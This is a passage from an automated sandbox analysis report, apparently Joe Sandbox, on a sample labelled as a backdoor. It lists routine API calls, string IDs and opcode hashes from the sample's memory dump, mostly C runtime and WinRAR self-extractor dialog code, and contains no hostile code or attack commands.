                                                  • Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506
                                                • _free.LIBCMT ref: 007F8ED1
                                                • _free.LIBCMT ref: 007F8EDC
                                                • _free.LIBCMT ref: 007F8EE7
                                                • _free.LIBCMT ref: 007F8EF2
                                                • _free.LIBCMT ref: 007F8EFD
                                                • _free.LIBCMT ref: 007F8F08
                                                • _free.LIBCMT ref: 007F8F13
                                                • _free.LIBCMT ref: 007F8F1E
                                                • _free.LIBCMT ref: 007F8F2C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 4070c2fc609d9f27f2178a0e08eb6278a2fef173606ec28cf73a1d76ec3c8dbc
                                                • Instruction ID: 69d5b7e09d585c98669ea95af88eab9b5fa7690dc34f7db99d9f94422f4eabac
                                                • Opcode Fuzzy Hash: 4070c2fc609d9f27f2178a0e08eb6278a2fef173606ec28cf73a1d76ec3c8dbc
                                                • Instruction Fuzzy Hash: 5711D27610014DEFCB91EF94C846DFA3BA5FF08350B0180A0BA088B626DA35EA51DB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ;%u$x%u$xc%u
                                                • API String ID: 0-2277559157
                                                • Opcode ID: aa5030391c03d87d99377164ff8259c4bcbc3c5259476bd977c7074c80d62488
                                                • Instruction ID: c0b557894a908425af4c64166102bcd0cb65d276c6c62e86d70efbd74e485fd4
                                                • Opcode Fuzzy Hash: aa5030391c03d87d99377164ff8259c4bcbc3c5259476bd977c7074c80d62488
                                                • Instruction Fuzzy Hash: F5F12A716043419BDB25DF348899BEE77B96FA0310F08456BF9858B383DA6CD847C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                  • Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                • EndDialog.USER32(?,00000001), ref: 007EAD20
                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 007EAD47
                                                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 007EAD60
                                                • SetWindowTextW.USER32(?,?), ref: 007EAD71
                                                • GetDlgItem.USER32(?,00000065), ref: 007EAD7A
                                                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 007EAD8E
                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 007EADA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: MessageSend$Item$TextWindow$Dialog
                                                • String ID: LICENSEDLG
                                                • API String ID: 3214253823-2177901306
                                                • Opcode ID: 7b36987efdd560a0fcd692a1f4d30bf95cbe903b3d1c7fd091326adbaafb517d
                                                • Instruction ID: 3c4ee947a8734cbf16e5072eec46ea793efd6b52bc16d8c7a280b82ffb0a0eb4
                                                • Opcode Fuzzy Hash: 7b36987efdd560a0fcd692a1f4d30bf95cbe903b3d1c7fd091326adbaafb517d
                                                • Instruction Fuzzy Hash: 69210532341254FBE2259F72ED4DE7B3B6CFB8EB56F004414F604E25A0CB6AA901D632
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D9448
                                                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 007D946B
                                                • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 007D948A
                                                  • Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2
                                                • _swprintf.LIBCMT ref: 007D9526
                                                  • Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D
                                                • MoveFileW.KERNEL32(?,?), ref: 007D9595
                                                • MoveFileW.KERNEL32(?,?), ref: 007D95D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                • String ID: rtmp%d
                                                • API String ID: 2111052971-3303766350
                                                • Opcode ID: 709fcb0d32dc246bf2e49c6a3497e66773a83b97c4022f49c3b85c758e727940
                                                • Instruction ID: 9db698906d0a3fb76e1adb2a5922c1225a513ba28202a41040a1d22535e7b7f6
                                                • Opcode Fuzzy Hash: 709fcb0d32dc246bf2e49c6a3497e66773a83b97c4022f49c3b85c758e727940
                                                • Instruction Fuzzy Hash: 25412171901159F6CF60EB61CC89ADE737CAF15780F0444E6B649E3242EB789B89CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __aulldiv.LIBCMT ref: 007E0A9D
                                                  • Part of subcall function 007DACF5: GetVersionExW.KERNEL32(?), ref: 007DAD1A
                                                • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 007E0AC0
                                                • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 007E0AD2
                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 007E0AE3
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007E0AF3
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007E0B03
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 007E0B3D
                                                • __aullrem.LIBCMT ref: 007E0BCB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                • String ID:
                                                • API String ID: 1247370737-0
                                                • Opcode ID: 4c35439f09564c0ddbdc7f3b87a1428cbba69f7777353f123f301096b12a9eba
                                                • Instruction ID: 08dab8fe2ea49d074da747fcd4d6165bea41068a2945a6e8373810f1fcb31dc2
                                                • Opcode Fuzzy Hash: 4c35439f09564c0ddbdc7f3b87a1428cbba69f7777353f123f301096b12a9eba
                                                • Instruction Fuzzy Hash: 3C4127B1408346AFC350DF65C88496BFBF8FB88714F004E2EF59692650E778E588CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,007FF5A2,?,00000000,?,00000000,00000000), ref: 007FEE6F
                                                • __fassign.LIBCMT ref: 007FEEEA
                                                • __fassign.LIBCMT ref: 007FEF05
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 007FEF2B
                                                • WriteFile.KERNEL32(?,?,00000000,007FF5A2,00000000,?,?,?,?,?,?,?,?,?,007FF5A2,?), ref: 007FEF4A
                                                • WriteFile.KERNEL32(?,?,00000001,007FF5A2,00000000,?,?,?,?,?,?,?,?,?,007FF5A2,?), ref: 007FEF83
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: f7141929c4ca7c3add651b5d299564ce60f1de9755c257dafd19d3a5c3ddfd7d
                                                • Instruction ID: 1aa3a7a2fbdce92cee0a3d073c13648e20464d3e4fa865131ba0b14ae448ba96
                                                • Opcode Fuzzy Hash: f7141929c4ca7c3add651b5d299564ce60f1de9755c257dafd19d3a5c3ddfd7d
                                                • Instruction Fuzzy Hash: 77519171A002499FDB10CFA8D845AFEBBF9FF09310F24451AEA55E73A1E7749A41CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetTempPathW.KERNEL32(00000800,?), ref: 007EC54A
                                                • _swprintf.LIBCMT ref: 007EC57E
                                                  • Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D
                                                • SetDlgItemTextW.USER32(?,00000066,0081946A), ref: 007EC59E
                                                • _wcschr.LIBVCRUNTIME ref: 007EC5D1
                                                • EndDialog.USER32(?,00000001), ref: 007EC6B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                • String ID: %s%s%u
                                                • API String ID: 2892007947-1360425832
                                                • Opcode ID: 89f30ba714d0773264453fddbffc20a82989496a230e07cd74d9510f025664f8
                                                • Instruction ID: 6a61016996057de8e24358c0509680a7a96d2b3d5763af714a7ec170c4dbe9d1
                                                • Opcode Fuzzy Hash: 89f30ba714d0773264453fddbffc20a82989496a230e07cd74d9510f025664f8
                                                • Instruction Fuzzy Hash: DA41C075D00658EADB26DBA1DC49EEA77BCFF08301F0080A2E509E61A0E7799BC5CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 007E8F38
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 007E8F59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AllocByteCharGlobalMultiWide
                                                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                • API String ID: 3286310052-4209811716
                                                • Opcode ID: e8a3f964eb265bf52622c0073efff4f186c5149231db063959c835ec359803c8
                                                • Instruction ID: 6b2988034e050466898999469ef290da041d2276c1fcf0f155c785a8a753931b
                                                • Opcode Fuzzy Hash: e8a3f964eb265bf52622c0073efff4f186c5149231db063959c835ec359803c8
                                                • Instruction Fuzzy Hash: 14316A31149345ABD724BB359C0AFAF7758EF89720F040109FA15A62C1EF6C9A08C3A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ShowWindow.USER32(?,00000000), ref: 007E964E
                                                • GetWindowRect.USER32(?,00000000), ref: 007E9693
                                                • ShowWindow.USER32(?,00000005,00000000), ref: 007E972A
                                                • SetWindowTextW.USER32(?,00000000), ref: 007E9732
                                                • ShowWindow.USER32(00000000,00000005), ref: 007E9748
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Window$Show$RectText
                                                • String ID: RarHtmlClassName
                                                • API String ID: 3937224194-1658105358
                                                • Opcode ID: eb17cfc06598378d5e8c18fff0761744030d9dfb7ab931e6b6357e1eb36f6060
                                                • Instruction ID: 21ce83feca6f74afaf3e4adc1d61aa8f66964d9acb964f1f2ff6f62b1000bad7
                                                • Opcode Fuzzy Hash: eb17cfc06598378d5e8c18fff0761744030d9dfb7ab931e6b6357e1eb36f6060
                                                • Instruction Fuzzy Hash: A531AE32005254EFCB119F65DD4CB6F7BA8FF88711F004959FE499A262DB38E948CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007FBF79: _free.LIBCMT ref: 007FBFA2
                                                • _free.LIBCMT ref: 007FC003
                                                  • Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
                                                  • Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506
                                                • _free.LIBCMT ref: 007FC00E
                                                • _free.LIBCMT ref: 007FC019
                                                • _free.LIBCMT ref: 007FC06D
                                                • _free.LIBCMT ref: 007FC078
                                                • _free.LIBCMT ref: 007FC083
                                                • _free.LIBCMT ref: 007FC08E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                                • Instruction ID: 49788e69e311e2691ccfb5f821a16bea5decc9edbdba77fd9e1eb334483f7a00
                                                • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                                • Instruction Fuzzy Hash: EB113D72550B0DFAD660BBB0CC0BFEBB7DD7F00700F408855B39966652DB69F9048A91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,?,007F20C1,007EFB12), ref: 007F20D8
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007F20E6
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007F20FF
                                                • SetLastError.KERNEL32(00000000,?,007F20C1,007EFB12), ref: 007F2151
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: d9923e0977f631af3f69ce3c26938d650bf4e02ca6dd56272b493408c79d0008
                                                • Instruction ID: a3991e97ba63e03eadf51ab86fb13d4a44f1b8b2e59e1bebee2e77b8ecc5f05a
                                                • Opcode Fuzzy Hash: d9923e0977f631af3f69ce3c26938d650bf4e02ca6dd56272b493408c79d0008
                                                • Instruction Fuzzy Hash: E701883210D71DAEF7946BB5BC895372A48FF217747210B29F320553E2FF5A4C069148
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                • API String ID: 0-1718035505
                                                • Opcode ID: d1c96a595ac60b8697f718be2764bc496d2dffc5965395f98067c9c9b2aaf538
                                                • Instruction ID: 1ca08d5c079f26b1f85a3748cc4f95f173ecbceb522482788647eca28d8f8a9e
                                                • Opcode Fuzzy Hash: d1c96a595ac60b8697f718be2764bc496d2dffc5965395f98067c9c9b2aaf538
                                                • Instruction Fuzzy Hash: D7012661343B625F8FB05F765C902E61398FB89392330252AE541D3350DA99CC42DAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007E0D0D
                                                  • Part of subcall function 007DACF5: GetVersionExW.KERNEL32(?), ref: 007DAD1A
                                                • LocalFileTimeToFileTime.KERNEL32(?,007E0CB8), ref: 007E0D31
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 007E0D47
                                                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 007E0D56
                                                • SystemTimeToFileTime.KERNEL32(?,007E0CB8), ref: 007E0D64
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007E0D72
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Time$File$System$Local$SpecificVersion
                                                • String ID:
                                                • API String ID: 2092733347-0
                                                • Opcode ID: fc2be0522ba82e480598388e321b34f46c308d73984b7e2deca78bdc98604f79
                                                • Instruction ID: 90485e1b606c641eaf247fe32a040a72494fe6b35342c4a7addb0682251dafe8
                                                • Opcode Fuzzy Hash: fc2be0522ba82e480598388e321b34f46c308d73984b7e2deca78bdc98604f79
                                                • Instruction Fuzzy Hash: 7D31E97A90024AEBCB10DFE5C8859EFBBBCFF58700B04456AE955E3610E7349685CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
